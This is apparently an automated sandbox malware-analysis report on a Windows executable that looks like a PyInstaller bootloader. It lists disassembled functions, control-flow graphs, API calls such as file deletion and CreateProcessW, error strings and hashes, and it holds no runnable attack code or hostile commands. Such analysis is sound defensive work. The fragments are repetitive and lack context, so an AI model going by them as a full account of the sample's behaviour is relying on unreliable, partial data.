7ff6029a40b8 call 7ff6029a74d8 540->543 542->537 543->542
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                            • Opcode ID: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction ID: b1ed138aefb6c3d9f2fc5af3cc7eabdc426ba25096205da525745fdffaa3e594
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBC1E032B28A4186EB11CFA6C5806AC3B61FB49B9CF611239DE1E973D6CF78D455C340
                                                                                                                                                                                                                            Function 00007FF602997900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF60299796B
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF6029979EE
                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A0D
                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A1B
                                                                                                                                                                                                                            • FindClose.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A2C
                                                                                                                                                                                                                            • RemoveDirectoryW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A35
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                            • Opcode ID: d57224a42d3b0494913a20955501f553c2592d571479c23a7232452ef9acb443
                                                                                                                                                                                                                            • Instruction ID: 87de05e3530dbb09626c8cccc1ae563330c24ee2b14ed6161d1b187f3680d0fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57224a42d3b0494913a20955501f553c2592d571479c23a7232452ef9acb443
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7412661A1CA4289EE309F6AE4441F9A760FF9876CFA00632D99DC36C6DFBCD655C700
                                                                                                                                                                                                                            Function 00007FF6029B4CFC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 835 7ff6029b4cfc-7ff6029b4d31 call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 842 7ff6029b4e6f-7ff6029b4edd call 7ff6029a9780 call 7ff6029b0304 835->842 843 7ff6029b4d37-7ff6029b4d42 call 7ff6029b4418 835->843 854 7ff6029b4edf-7ff6029b4ee6 842->854 855 7ff6029b4eeb-7ff6029b4eee 842->855 843->842 848 7ff6029b4d48-7ff6029b4d53 call 7ff6029b4448 843->848 848->842 856 7ff6029b4d59-7ff6029b4d7c call 7ff6029a97c8 GetTimeZoneInformation 848->856 858 7ff6029b4f7b-7ff6029b4f7e 854->858 859 7ff6029b4ef0 855->859 860 7ff6029b4f25-7ff6029b4f38 call 7ff6029ac47c 855->860 867 7ff6029b4e44-7ff6029b4e6e call 7ff6029b4400 call 7ff6029b43f0 call 7ff6029b43f8 856->867 868 7ff6029b4d82-7ff6029b4da3 856->868 863 7ff6029b4f84-7ff6029b4f8c call 7ff6029b4a80 858->863 864 7ff6029b4ef3 858->864 859->864 875 7ff6029b4f43-7ff6029b4f5e call 7ff6029b0304 860->875 876 7ff6029b4f3a 860->876 865 7ff6029b4ef8-7ff6029b4f24 call 7ff6029a97c8 call 7ff60299b5c0 863->865 864->865 866 7ff6029b4ef3 call 7ff6029b4cfc 864->866 866->865 871 7ff6029b4dae-7ff6029b4db5 868->871 872 7ff6029b4da5-7ff6029b4dab 868->872 878 7ff6029b4dc9 871->878 879 7ff6029b4db7-7ff6029b4dbf 871->879 872->871 894 7ff6029b4f60-7ff6029b4f63 875->894 895 7ff6029b4f65-7ff6029b4f77 call 7ff6029a97c8 875->895 882 7ff6029b4f3c-7ff6029b4f41 call 7ff6029a97c8 876->882 888 7ff6029b4dcb-7ff6029b4e3f call 7ff6029b9530 * 4 call 7ff6029b18dc call 7ff6029b4f94 * 2 878->888 879->878 884 7ff6029b4dc1-7ff6029b4dc7 879->884 882->859 884->888 888->867 894->882 895->858
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4448: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B445C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                                            • Opcode ID: 0f3283847f15c13fbe07a233ec23dc9a028512d3283ed39990bc2be6d200f3c9
                                                                                                                                                                                                                            • Instruction ID: 1a3fba4cc495798e34acbb1d96239d576753923b1c089756c9e9a044fd92d29a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f3283847f15c13fbe07a233ec23dc9a028512d3283ed39990bc2be6d200f3c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD51A132A1864286E711DF27EA911B97B60FF8878CF606135EA4DC7697DFBCE4019740
                                                                                                                                                                                                                            Function 00007FF602998300 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction ID: 0eec0533ce7a8f831826c8006c1060744d8332ddbf30b9b71040a25de4d18897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF0C862A1C7418BF7A08B69B48A76A7790FF8473CF140339DA6D426D5DF7CD059CA00
                                                                                                                                                                                                                            Function 00007FF6029AF654 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                            • Opcode ID: 9ac1dc9cddc2bc399561159482218908d43417da58d47a969a1af359aeee91bd
                                                                                                                                                                                                                            • Instruction ID: 7f687aa2411a0a56027b21c678b4a1d7e8230964fa7c047a6785ac1998f145c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac1dc9cddc2bc399561159482218908d43417da58d47a969a1af359aeee91bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE02AF21E0DB4381FB55AB2394002B96E90AF41B98F744639DD5ECBBD3DEFEA4019390
                                                                                                                                                                                                                            Function 00007FF6029918F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 174 7ff6029918f0-7ff60299192b call 7ff602993f50 177 7ff602991bc1-7ff602991be5 call 7ff60299b5c0 174->177 178 7ff602991931-7ff602991971 call 7ff6029975f0 174->178 183 7ff602991bae-7ff602991bb1 call 7ff60299f0bc 178->183 184 7ff602991977-7ff602991987 call 7ff60299f744 178->184 188 7ff602991bb6-7ff602991bbe 183->188 189 7ff6029919a1-7ff6029919bd call 7ff60299f40c 184->189 190 7ff602991989-7ff60299199c call 7ff602992760 184->190 188->177 195 7ff6029919bf-7ff6029919d2 call 7ff602992760 189->195 196 7ff6029919d7-7ff6029919ec call 7ff6029a3ea4 189->196 190->183 195->183 201 7ff6029919ee-7ff602991a01 call 7ff602992760 196->201 202 7ff602991a06-7ff602991a87 call 7ff602991bf0 * 2 call 7ff60299f744 196->202 201->183 210 7ff602991a8c-7ff602991a9f call 7ff6029a3ec0 202->210 213 7ff602991aa1-7ff602991ab4 call 7ff602992760 210->213 214 7ff602991ab9-7ff602991ad2 call 7ff60299f40c 210->214 213->183 219 7ff602991ad4-7ff602991ae7 call 7ff602992760 214->219 220 7ff602991aec-7ff602991b08 call 7ff60299f180 214->220 219->183 225 7ff602991b0a-7ff602991b16 call 7ff6029925f0 220->225 226 7ff602991b1b-7ff602991b29 220->226 225->183 226->183 228 7ff602991b2f-7ff602991b3e 226->228 229 7ff602991b40-7ff602991b46 228->229 231 7ff602991b60-7ff602991b6f 229->231 232 7ff602991b48-7ff602991b55 229->232 231->231 233 7ff602991b71-7ff602991b7a 231->233 232->233 234 7ff602991b8f 233->234 235 7ff602991b7c-7ff602991b7f 233->235 237 7ff602991b91-7ff602991bac 234->237 235->234 236 7ff602991b81-7ff602991b84 235->236 236->234 238 7ff602991b86-7ff602991b89 236->238 237->183 237->229 238->234 239 7ff602991b8b-7ff602991b8d 238->239 239->237
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                            • Opcode ID: 836b47718657b2a1b3339cc25782f59462ea8991cdf4b098d3c399e0302976f1
                                                                                                                                                                                                                            • Instruction ID: 3bc60567fb18ec63b79c1fed2e8987e1e06e0d8f5f617e6a06a0d30bec826ce8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 836b47718657b2a1b3339cc25782f59462ea8991cdf4b098d3c399e0302976f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0071E531E0868399EB20CB1ED5503B96B92FF4979CF644035E98DC7B8BEEACE5558700
                                                                                                                                                                                                                            Function 00007FF6029915C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 240 7ff6029915c0-7ff6029915d1 241 7ff6029915d3-7ff6029915dc call 7ff602991050 240->241 242 7ff6029915f7-7ff602991611 call 7ff602993f50 240->242 247 7ff6029915ee-7ff6029915f6 241->247 248 7ff6029915de-7ff6029915e9 call 7ff6029925f0 241->248 249 7ff602991613-7ff60299163a call 7ff602992760 242->249 250 7ff60299163b-7ff602991655 call 7ff602993f50 242->250 248->247 256 7ff602991671-7ff602991688 call 7ff60299f744 250->256 257 7ff602991657-7ff60299166c call 7ff6029925f0 250->257 263 7ff60299168a-7ff6029916a6 call 7ff602992760 256->263 264 7ff6029916ab-7ff6029916af 256->264 262 7ff6029917c5-7ff6029917c8 call 7ff60299f0bc 257->262 270 7ff6029917cd-7ff6029917df 262->270 274 7ff6029917bd-7ff6029917c0 call 7ff60299f0bc 263->274 267 7ff6029916b1-7ff6029916bd call 7ff6029911f0 264->267 268 7ff6029916c9-7ff6029916e9 call 7ff6029a3ec0 264->268 275 7ff6029916c2-7ff6029916c4 267->275 276 7ff6029916eb-7ff602991707 call 7ff602992760 268->276 277 7ff60299170c-7ff602991717 268->277 274->262 275->274 285 7ff6029917b3-7ff6029917b8 276->285 280 7ff6029917a6-7ff6029917ae call 7ff6029a3eac 277->280 281 7ff60299171d-7ff602991726 277->281 280->285 284 7ff602991730-7ff602991752 call 7ff60299f40c 281->284 289 7ff602991754-7ff60299176c call 7ff60299fb4c 284->289 290 7ff602991785-7ff60299178c 284->290 285->274 296 7ff60299176e-7ff602991771 289->296 297 7ff602991775-7ff602991783 289->297 291 7ff602991793-7ff60299179c call 7ff602992760 290->291 298 7ff6029917a1 291->298 296->284 299 7ff602991773 296->299 297->291 298->280 299->298
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                            • Opcode ID: 7357adf9999cca54884c8793987b2a834a18990e7889689fe3dae01b567150d2
                                                                                                                                                                                                                            • Instruction ID: 6407cc18d1fd11d8f2945dbc832357982262034f8f189bcc131f36ec77d768ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7357adf9999cca54884c8793987b2a834a18990e7889689fe3dae01b567150d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3151F061F086439AEA109B1BE9001B96B60FF44BACF644031EE0CC7B97EFBDE1658340
                                                                                                                                                                                                                            Function 00007FF602997F10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                            • Opcode ID: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction ID: 90ba3ad141af14384b1a085431f9e99838602150f9cc0e0227781e7c16ddf57f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413131A0878285EB209B65F4452AEB7A0FF89378F600335E6AD877D6DFBCD0548B40
                                                                                                                                                                                                                            Function 00007FF6029911F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 548 7ff6029911f0-7ff60299124d call 7ff60299ae00 551 7ff60299124f-7ff602991276 call 7ff6029925f0 548->551 552 7ff602991277-7ff60299128f call 7ff6029a3ec0 548->552 557 7ff602991291-7ff6029912a8 call 7ff602992760 552->557 558 7ff6029912ad-7ff6029912bd call 7ff6029a3ec0 552->558 563 7ff602991409-7ff60299141e call 7ff60299aae0 call 7ff6029a3eac * 2 557->563 564 7ff6029912bf-7ff6029912d6 call 7ff602992760 558->564 565 7ff6029912db-7ff6029912ed 558->565 580 7ff602991423-7ff60299143d 563->580 564->563 566 7ff6029912f0-7ff602991315 call 7ff60299f40c 565->566 574 7ff602991401 566->574 575 7ff60299131b-7ff602991325 call 7ff60299f180 566->575 574->563 575->574 581 7ff60299132b-7ff602991337 575->581 582 7ff602991340-7ff602991368 call 7ff602999240 581->582 585 7ff6029913e6-7ff6029913fc call 7ff6029925f0 582->585 586 7ff60299136a-7ff60299136d 582->586 585->574 587 7ff60299136f-7ff602991379 586->587 588 7ff6029913e1 586->588 590 7ff6029913a4-7ff6029913a7 587->590 591 7ff60299137b-7ff602991389 call 7ff60299fb4c 587->591 588->585 592 7ff6029913a9-7ff6029913b7 call 7ff6029b8e90 590->592 593 7ff6029913ba-7ff6029913bf 590->593 597 7ff60299138e-7ff602991391 591->597 592->593 593->582 596 7ff6029913c5-7ff6029913c8 593->596 601 7ff6029913ca-7ff6029913cd 596->601 602 7ff6029913dc-7ff6029913df 596->602 598 7ff60299139f-7ff6029913a2 597->598 599 7ff602991393-7ff60299139d call 7ff60299f180 597->599 598->585 599->593 599->598 601->585 604 7ff6029913cf-7ff6029913d7 601->604 602->574 604->566
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                            • Opcode ID: ce8762095e2481ef98b6baba2e7ff42592d2236a169c4c8f9ec5af115cda9da3
                                                                                                                                                                                                                            • Instruction ID: d611e12a62c6377948f8f3a41cbef4203d4d55f44b3c84ce1bee7197b8eff2f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8762095e2481ef98b6baba2e7ff42592d2236a169c4c8f9ec5af115cda9da3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6451E422A0864389EB209B1BA5503BA6A91FF857A8F644135ED4DC7BD7EFBCE451C700
                                                                                                                                                                                                                            Function 00007FF6029ADB90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,-00000018,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD0C
